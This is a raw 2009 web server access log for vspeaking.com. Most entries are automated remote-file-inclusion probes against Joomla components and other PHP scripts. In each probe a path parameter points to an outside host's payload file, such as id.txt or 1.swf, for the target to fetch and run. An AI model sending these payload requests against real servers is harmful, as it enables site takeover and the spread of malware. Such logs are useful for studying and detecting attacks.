195.34.78.110 - - [29/Jun/2009:00:02:24 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:02:24 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:02:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:02:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:02:26 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:02:26 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.165.34.48 - - [29/Jun/2009:00:02:26 -0700] "GET /logs/access_090126.log%20//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:03:03 -0700] "GET /postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:03:04 -0700] "GET /logs/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:03:05 -0700] "GET /logs/access.log%20%20/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:05:20 -0700] "GET /logs/access.log/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:07:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:07:42 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:07:42 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:12:09 -0700] "GET /logs//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.30.81.181 - - [29/Jun/2009:00:12:12 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "vspeaking.com"
60.43.229.5 - - [29/Jun/2009:00:12:13 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.43.229.5 - - [29/Jun/2009:00:12:13 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.43.229.5 - - [29/Jun/2009:00:12:13 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:12:14 -0700] "GET /logs///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:12:14 -0700] "GET /logs/access.log///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:12:14 -0700] "GET //components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:12:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:12:14 -0700] "GET /administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.209.12 - - [29/Jun/2009:00:13:31 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.55.209.12 - - [29/Jun/2009:00:13:31 -0700] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
60.43.229.5 - - [29/Jun/2009:00:14:29 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:15:01 -0700] "GET /logs/access.log///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:15:01 -0700] "GET /logs///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:15:01 -0700] "GET //components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:16:26 -0700] "GET /administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:16:26 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:16:26 -0700] "GET /logs//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:16:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:16:31 -0700] "GET /logs//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:16:31 -0700] "GET /administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:19:30 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:00:19:31 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:21:12 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:21:40 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [29/Jun/2009:00:22:30 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:24:07 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:24:07 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:24:07 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:00:25:18 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:00:25:18 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:00:25:19 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.100.5.136 - - [29/Jun/2009:00:25:32 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
61.100.5.136 - - [29/Jun/2009:00:25:32 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
61.100.5.136 - - [29/Jun/2009:00:25:32 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:25:44 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:25:44 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [29/Jun/2009:00:25:44 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:00:26:59 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:00:27:00 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:00:27:00 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.100.5.136 - - [29/Jun/2009:00:48:50 -0700] "GET /logs/access_090413.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
61.100.5.136 - - [29/Jun/2009:00:52:47 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:00:52:54 -0700] "GET /logs/access_090105.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:55:53 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:55:53 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2376 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:56:11 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:56:11 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:56:11 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2376 "-" "libwww-perl/5.805" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:00:56:25 -0700] "GET /logs/access_090105.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:00:58:00 -0700] "GET /oneadmin/config.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:00:58:01 -0700] "GET /oneadmin/config.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:59:16 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:59:16 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "vspeaking.com"
209.68.2.99 - - [29/Jun/2009:00:59:16 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2376 "-" "libwww-perl/5.805" "vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:00:00 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:00:00 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:00:01 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:01:00:21 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2376 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:01:00:21 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:00:36 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:00:42 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:00:54 -0700] "GET /logs/access_090105.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:01:00:56 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:01:02:07 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:01:02:07 -0700] "GET /logs/access_090112.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:01:02:08 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:01:02:33 -0700] "GET /logs/access_090126.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:01:02:47 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:02:56 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:02:56 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:01:02:56 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.16.83.70 - - [29/Jun/2009:01:03:17 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
201.232.54.48 - - [29/Jun/2009:01:04:10 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:33 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:33 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:34 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:34 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:34 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:38 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:38 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:38 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
